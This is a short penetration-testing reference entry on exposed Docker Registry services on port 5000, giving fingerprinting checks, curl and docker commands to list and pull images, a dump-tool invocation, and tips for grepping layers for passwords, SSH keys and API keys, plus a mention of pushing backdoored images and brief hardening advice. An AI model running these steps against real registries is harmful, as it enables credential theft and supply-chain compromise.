Docker Registry
aka registry
Container image registry on 5000. Frequently unauthenticated — list the catalog, pull image layers, and unpack them for source code, config and hard-coded secrets baked into the images.
Ports
| Port | Proto | Notes |
|---|---|---|
5000 | tcp | Docker Registry API v2 |
Fingerprint
- GET /v2/ returns 200 (or 401 if auth) with Docker-Distribution-Api-Version header
- /v2/_catalog lists repositories
Exploitation primitives
- List repos and tags unauthenticated (/v2/_catalog)
- Pull image layers and extract baked-in secrets, source, .env, SSH keys
- Push a backdoored image if the registry is writable
Overview
A Docker Registry on 5000 stores container images. Images routinely contain secrets, so an open registry is a credential and source-code leak.
Enumeration
Confirm the API and list repositories:
curl -s http://<TARGET>:5000/v2/_catalogList tags for a repo:
curl -s http://<TARGET>:5000/v2/<repo>/tags/listPull and loot an image
Grab everything with the helper:
python3 drg.py --host <TARGET> --port 5000 --dumpOr pull and dig manually:
docker pull <TARGET>:5000/<repo>:<tag> && docker history --no-trunc <TARGET>:5000/<repo>:<tag>Then unpack layers and grep for password, .env, id_rsa, API keys.
Hardening
Require authentication (htpasswd/token), make the registry read-only to anonymous, use TLS, and scan images so secrets never get baked in.